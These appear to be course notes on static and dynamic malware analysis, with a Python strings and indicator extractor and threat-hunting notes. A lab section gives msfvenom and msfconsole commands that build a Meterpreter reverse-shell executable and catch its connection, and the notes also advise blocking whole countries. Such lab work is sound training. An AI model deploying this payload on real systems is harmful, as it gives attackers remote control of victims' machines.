2- VirusTotal (look up the hash first; uploading the file itself tells the world, and possibly the attacker, that the sample was found)

3- Strings (search for IPs / URLs / other indicators): print the sequences of printable characters in the file.

# strings file

# strings -n 10 file : only strings of 10 characters or more

# strings file | grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}"

4- PEiD: detects the most common packers, cryptors and compilers for PE files.

5- Dependency Walker (the equivalent of ldd for Linux libraries): free Windows tool that scans any
Windows file (exe, dll, ...) and builds a hierarchical tree of all the dependent
modules (dll, exe, ...)

Imported functions worth noticing in Dependency Walker

- accept / connect / ControlService / CheckRemote

- CreateMutex (mutual exclusion: so that the malware does not run more than once)

- inet_addr, InternetOpen, InternetOpenUrl

- NetScheduleJobAdd, NetShareEnum

Dynamic malware analysis

6- TCPView

7- Process Explorer

8- Process Monitor
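Steps 1, 3 and 5 above in one added Python example that is not code from the course: hashes as md5sum/sha256sum produce them, a strings -n equivalent, indicator extraction, and a look for the imports the notes single out. The sample bytes are constructed, not a real binary. The IPv4 pattern validates each octet, which the notes' ([0-9]{1,3}\.){3}[0-9]{1,3} does not (it happily reports 999.999.999.999); version strings such as 1.3.8.2 still collide with it and have to be weeded out by hand.

```python
import hashlib
import re

# Constructed stand-in for a suspicious binary: a few header bytes, two
# imported API names, a version string, a C2 address and a URL. Not a real sample.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"CreateMutexA\x00InternetOpenUrlA\x00"
    b"\x01\x02ab\x03"
    b"v2.1.7\x00"
    b"connect to 203.0.113.7:4444\x00"
    b"http://malware.example/stage2.exe\x00"
    b"fake 999.999.999.999 not an address\x00"
)

# Imports the notes single out (A/W suffixes are the ANSI/wide variants)
SUSPICIOUS_IMPORTS = {
    "accept", "connect", "ControlService", "CreateMutexA", "CreateMutexW",
    "inet_addr", "InternetOpenA", "InternetOpenW", "InternetOpenUrlA",
    "InternetOpenUrlW", "NetScheduleJobAdd", "NetShareEnum",
}

# IPv4 with every octet in 0-255, not preceded or followed by another digit
IPV4_RE = re.compile(
    r"(?<!\d)(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)(?!\d)"
)
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def hashes(data):
    """Same digests as md5sum / sha256sum on the file."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


def extract_strings(data, min_len=4):
    """Equivalent of strings -n <min_len>: runs of printable ASCII (0x20-0x7e)."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def find_indicators(strings):
    """De-duplicated IPs and URLs found in the strings; candidates for the IOC."""
    ips = {m.group(0) for s in strings for m in IPV4_RE.finditer(s)}
    urls = {m.group(0) for s in strings for m in URL_RE.finditer(s)}
    return {"ipv4": sorted(ips), "urls": sorted(urls)}


def suspicious_imports(strings):
    """Import names worth a closer look (exact matches against the list above)."""
    return sorted(set(strings) & SUSPICIOUS_IMPORTS)


if __name__ == "__main__":
    print(hashes(SAMPLE))
    found = extract_strings(SAMPLE)
    print(found)
    print(find_indicators(found))
    print(suspicious_imports(found))
```

Hashes identify this exact file only; a recompiled or repacked variant gets a new hash, which is why the strings-derived indicators (address, URL, mutex name) usually survive longer in an IOC than the hash does.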
Day 10: 12 September 2019; Malware Analysis

Dynamic malware analysis

For that, we create our own malware and work on it

Steps:

1- Create the malware on Kali:

# msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<kali ip> LPORT=7777 -f exe > malware.exe

2- Analyse:

Serve the file from Kali and listen for the connection back to Kali

# python -m SimpleHTTPServer 8888

# msfconsole

msf> use exploit/multi/handler

msf> set PAYLOAD windows/x64/meterpreter_reverse_tcp

msf> set LHOST <kali ip>

msf> set LPORT 7777

msf> exploit

3- Infect Windows

- From the Windows VM, browse to http://<kali ip>:8888 and download malware.exe

- Launch malware.exe on Windows

4- Behaviour analysis:

Use these tools to follow the behaviour of the malware and its actions (connections, exe files, dll files)

* TCPView: check for outgoing connections, strange IP addresses

* Process Explorer: search for processes without a company name

* Process Monitor:

- check changes in processes

- check process paths

- check process names (svchost look-alikes: ScVhost, ScVHost, ...)

* Payload types:

               Staged       Stageless
Hash           different    different
VirusTotal     different    different
Strings        different    equal

* Staged (meterpreter/reverse_tcp): the exe only contains a small stager; the rest of Meterpreter is downloaded from the handler once the connection is up, so the file itself carries little. Stageless (meterpreter_reverse_tcp, as in the msfvenom command above): the whole payload is inside the file.


* Threat hunting:

- Active cyber defence activity. It is "the process of proactively and iteratively searching through networks to
detect and isolate advanced threats that evade existing security solutions."

- Anatomy of a cyberattack

* Research

* Penetration

* Expand

* Exploit

- Block traffic by country (Russia, Ukraine, Serbia, Bulgaria, Romania, India, Iran, Israel, ...)

- Have an internal firewall to log events/connections between subnets

- Indicators of a cyberattack:

* Unusual outbound network traffic

* Anomalies in privileged user account activity

* Geographical irregularities

* Log-in irregularities and failures

* HTML response size

* Mismatched port/application traffic

* Suspicious registry activity

- Threat Hunting Maturity Model:

* Initial

* Minimal

* Procedural

* Innovative

* Leading

- DumpsterFire (Python toolset): generates IOCs and events that simulate attacks, for testing detection.

- Threat hunting techniques

* Searching (IOC + gateway logs)

*……………………..
